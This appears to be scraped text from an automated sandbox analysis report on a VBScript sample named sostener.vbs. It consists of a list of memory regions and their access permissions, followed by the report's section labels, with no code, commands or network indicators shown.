page read and write

22443AA8000

heap

page read and write

18502CF0000

heap

page read and write

2245DD70000

heap

page read and write

22445C0A000

trusted library allocation

page read and write

7FFD9B9A0000

trusted library allocation

page read and write

5C10000

trusted library allocation

page read and write

6A2387E000

stack

page read and write

1850624D000

trusted library allocation

page read and write

185065ED000

trusted library allocation

page read and write

CA35C7E000

stack

page read and write

13A2000

trusted library allocation

page read and write

1768000

trusted library allocation

page read and write

6A2377E000

stack

page read and write

7FFD9B826000

trusted library allocation

page read and write

2757F811000

heap

page read and write

7FFD9B910000

trusted library allocation

page read and write

6B6E000

stack

page read and write

185049C1000

trusted library allocation

page read and write

7FFD9BA80000

trusted library allocation

page read and write

3110000

trusted library allocation

page read and write

185047D2000

trusted library allocation

page read and write

7F010000

trusted library allocation

page execute and read and write

141F000

heap

page read and write

22443BD0000

heap

page read and write

7FFD9B9F0000

trusted library allocation

page read and write

2757EB6E000

heap

page read and write

31F5000

trusted library allocation

page read and write

18506523000

trusted library allocation

page read and write

185049B0000

heap

page read and write

7FFD9BA40000

trusted library allocation

page read and write

22443C00000

heap

page read and write

31CD000

trusted library allocation

page read and write

1851D06C000

heap

page read and write

2245D961000

heap

page read and write

183C000

stack

page read and write

5BCE000

stack

page read and write

1657000

heap

page read and write

7FFD9BA90000

trusted library allocation

page read and write

320D000

trusted library allocation

page read and write

7FFD9B952000

trusted library allocation

page read and write

185030F0000

heap

page read and write

3120000

heap

page execute and read and write

2245D9DC000

heap

page read and write

7FFD9B856000

trusted library allocation

page execute and read and write

22445B11000

trusted library allocation

page read and write

400000

remote allocation

page execute and read and write

22443C50000

heap

page read and write

18502D30000

heap

page read and write

7FFD9B830000

trusted library allocation

page execute and read and write

7FFD9BA00000

trusted library allocation

page read and write

7FFD9B890000

trusted library allocation

page execute and read and write

185065E9000

trusted library allocation

page read and write

3117000

trusted library allocation

page read and write

1851CDDD000

heap

page read and write

There are 415 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
sostener.vbs

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportsostener.vbs

Files

Processes

URLs

Domains

IPs

Registry

Memdumps

IOC Report
sostener.vbs